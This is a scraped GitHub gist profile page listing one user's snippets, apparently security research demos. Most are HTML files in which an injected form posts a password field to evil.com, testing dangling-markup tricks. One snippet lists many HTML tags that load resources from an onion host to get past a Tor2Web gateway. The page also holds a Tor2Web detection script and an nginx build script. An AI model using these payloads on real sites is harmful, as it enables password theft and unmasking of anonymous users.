Skip to content

Instantly share code, notes, and snippets.

intchloe

Block or report user

Report or block intchloe

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
View Top_100k_Alexa_RR-TYPE-257.md

TOP 100.000 ALEXA RR TYPE 257 (dig +short -t TYPE257) | Scanned on 29/07/2016

Click on the domain for more information via Goolgle Public DNS Tool

<Alexa Rank> - <Domain>

View evil_stopped_with_closed_form_tag.html
<!-- The hacker injected this (line 2) -->
<form action="https://evil.com" method="post" name="fblogin" id="login">
</form><form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
View evil_stopped.html
<!-- The hacker injected this (line 2-5) -->
<form action="https://evil.com" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
<textarea>
</textarea>form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
View evil_extract_via_value.html
<!-- The hacker injected this (line 2) -->
<form method="post" name="fblogin" id="login" action="https://evil.com
<form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
View evil_fail.html
<!-- The hacker injected this (line 2-5) -->
<form action="https://evil.com" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
<textarea>
</textarea><form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
View evil.html
<!-- The hacker injected this (line 2-5) -->
<form action="https://evil.com" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
<textarea>
<form action="/login" method="post" name="fblogin" id="login">
<input type="password" name="pasword" />
<input type="submit" name="login" name="fblogin">
</form>
View detect_tor2web.php
<?php
$a = $_SERVER;
echo '<script type="text/javascript" src="/c.js"></script>
';
echo "------------- Alarming detections -------------</br>";
if (array_key_exists("HTTP_X_TOR2WEB",$a)) {
echo "The 'HTTP_X_TOR2WEB' key exist, so you are using Tor2Web!</br>";
View onion.cab bypasses
<!DOCTYPE html SYSTEM "https://swehackmzys2gpmb.onion/doctype">
<html xmlns="http://www.w3.org/1999/xhtml" manifest="https://swehackmzys2gpmb.onion/html-manifest">
<?IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation" ?>
<IMPORT namespace="myNS" implementation="https://swehackmzys2gpmb.onion/import-implementation-2" />
<meta http-equiv="Content-Security-Policy" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri">
<meta http-equiv="Content-Security-Policy-Report-Only" content="script-src 'self'; report-uri http://swehackmzys2gpmb.onion/meta-csp-report-uri-2">
<meta name="copyright" content="<img src='https://swehackmzys2gpmb.onion/meta-name-copyright-reading-view'>">
<meta name="displaydate" content="<img src='https://swehackmzys2gpmb.onion/meta-name-displaydate-reading-view'>">
<meta property="og:site_name" content="<img src='https://swehackmzys2gpmb.onion/meta-property-reading-view'>">
<a ping="http://swehackmzys2gpmb.onion/a-pin
View detect_tor2web.js
function (using_our_domain) {
var domains = ["c3dlaGFjay5vcmc=", "d3d3LnN3ZWhhY2sub3Jn", "c3dlaGFja216eXMyZ3BtYi5vbmlvbg=="];
var current = document.domain;
if (current != atob(domains[0]) && current != atob(domains[1]) && current != atob(domains[2])) {
document.getElementById('site-nav').innerHTML += '<br><b><center><font color="red">YOU ARE NOT USING ONE OF OUR DOMAINS!</b></font> CLICK <a href=https://'+atob(domains[0])+'>HERE</a> TO USE THE RIGHT ONE.';
}
}
View LibreSSL + nginx
#!/usr/bin/env bash
mkdir -p /root/nginx
cd /root/nginx
apt-get -y install curl wget build-essential libgd-dev libgeoip-dev checkinstall git
export NGINX_VERSION=1.9.9
export VERSION_PCRE=pcre-8.38
export VERSION_LIBRESSL=libressl-2.3.4
You can’t perform that action at this time.